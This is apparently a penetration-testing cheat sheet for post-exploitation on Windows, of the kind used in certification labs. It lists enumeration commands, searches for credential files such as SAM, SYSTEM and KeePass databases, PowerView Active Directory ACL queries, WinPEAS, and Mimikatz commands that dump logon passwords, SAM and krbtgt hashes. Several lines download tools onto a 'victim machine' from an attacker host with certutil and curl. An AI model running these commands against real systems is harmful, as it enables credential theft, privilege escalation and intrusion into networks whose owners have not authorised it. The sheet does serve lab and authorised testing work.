Windows
Online Resource
Points of Interest
To note: In an event the following commands do not work, attempt to:
1. Run - PATH=%PATH%;c:\windows\system32
Alternate PATH - PATH=%PATH%;C:\windows\system32;C:\windows;C:\windows\System32\Wbem;C:\windows\System32\WindowsPowerShell\v1.0;C:\windows\System32\OpenSSH;C:\Program Files\dotnet\
2. Use the binary directly from C:\Windows\System32\
User Permissions
whoami
whoami /all
whoami /user
whoami /priv
whoami /groups
net user
wmic <user>
dir env:
Get-LocalUser
Local accounts
net user
net user <username> /domain
# Check if account is active in domain
net localgroup administrators
net share
net computer <computer name>
net accounts # Get password requirements
System Information
Key information -
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type" /C:"Domain" /C:"Network Card"
Network information -
netstat -ano
ipconfig
Current Console
(dir 2>&1 *`|echo CMD);&<# rem #>echo PowerShell
Installed programs
Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
Interesting Files
where /r C:\Users\ *.txt
-> where /r C:\ local.txt
-> where /r C:\ proof.txt
where /r C:\ *.uac
where /r C:\ *.dll
dir C:\
To find specific files -
Get-ChildItem -Path C:\Users -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx,*ini,*.log,*.ps1 -File -Recurse -ErrorAction SilentlyContinue
Get-ChildItem -Path C:\Users -Include *.txt,*.pdf,*.kdbx -File -Recurse -ErrorAction SilentlyContinue
Get-ChildItem -Path C:\ -Include SAM,SYSTEM -File -Recurse -ErrorAction SilentlyContinue
Get-ChildItem -Path C:\ -Include local.txt,proof.txt -File -Recurse -ErrorAction SilentlyContinue
Web Root Directory
dir C:\inetpub\wwwroot
dir C:\xampp\htdocs
dir C:\<>\xampp\htdocs
Indication of Web directory root
> .htaccess, public_html, www, htdocs, httpdocs
Information Goldmine
Get-History
(Get-PSReadlineOption).HistorySavePath
Binary Analysis
powershell -ep bypass
Get-CimInstance -ClassName win32_service | Select Name, StartMode | Where-Object {$_.Name -like '<service name>'}
Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}
# Avoid running Get-CimInstance on non-interactive shells
certutil.exe -urlcache -split -f http://<Kali IP>/Watch-Command.ps1 Watch-Command.ps1
Import-Module .\Watch-Command.ps1
Get-Process <process name> -ErrorAction SilentlyContinue | Watch-Command -Difference -Continuous -Seconds 30
icacls <binary full path>
PowerView
powershell -ep bypass
Import-Module .\PowerView.ps1
Commands:
Get-NetDomain OR Get-Domain
Get-NetUser
Get-NetUser -SPN | select samaccountname, serviceprincipalname
Get-NetUser (User CN name)
To filter the result, pipe the output in to a select statement
Example: Get-NetUser | select cn, name, pwdlastset, lastlogon
Get-NetGroup
Get-NetGroup <Group name>
To filter the result, pipe the output in to a select statement
Example: Get-NetGroup | select cn, member
Get-NetComputer
Get-NetComputer <Computer name>
To filter the result, pipe the output in to a select statement
Example: Get-NetComputer | select cn, operatingsystem, dnshostname
Find-LocalAdminAccess
Get-NetSession -ComputerName <Computer name> -Verbose - Used to find logged on users on target computer
Permissions for NetSessionEnum are defined in SrvsvcSessionInfo registry key (HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\DefaultSecurity)
Get-NetComputer | Select-Object Name, @{Name='IPAddress';Expression={(Resolve-DnsName $_.Name).IPAddress}}
Get-Acl <Registry hive>:<Registry Key path> | fl
Get-ObjectAcl -Identity <user name | group name>
- Look for ActiveDirectoryRights, and SecurityIdentifier
Get-ObjectAcl -Identity <group name> | ?{$_.ActiveDirectoryRights -eq "GenericAll"} | select SecurityIdentifier,ActiveDirectoryRights
Get-ObjectAcl -Identity <group name> | ?{$_.ActiveDirectoryRights -eq "GenericWrite"} | select SecurityIdentifier,ActiveDirectoryRights
Convert-SIDToName <SID>
OR
"<SID>", "<SID>", "<SID>" | Convert-SIDToName
Get-NetGPO
Get-GPPermission -Name "<GPO displayname>" -All
Automated Enumeration
WinPeas
On the Attacker
/usr/share/peass/winpeas/winPEASx64.exe
wget https://github.com/peass-ng/PEASS-ng/releases/download/20250106-5a706ae2/winPEASx64.exe
/usr/share/peass/winpeas/winPEASx86.exe
wget https://github.com/peass-ng/PEASS-ng/releases/download/20250106-5a706ae2/winPEASx86.exe
Transfer the respective executable onto compromised system
Run the executable and enumerate the output
Mimikatz
On Kali machine:
wget https://github.com/ParrotSec/mimikatz/blob/master/x64/mimikatz.exe
On Victim machine:
certutil -urlcache -split -f http://192.168.45.165/mimikatz.exe mimikatz.exe
curl http://192.168.45.165/mimikatz.exe -o mimikatz.exe
To Run:
mimikatz.exe
privilege::debug
sekurlsa::logonpasswords # Find user NTLM hash
lsadump::lsa /patch # Find krbtgt NTLM hash
OR
Pass Mimikatz commands as arguments to the executable file
.\mimikatz.exe "privilege::debug" "token::elevate" "lsadump::sam" "sekurlsa::logonpasswords" "exit"
Last updated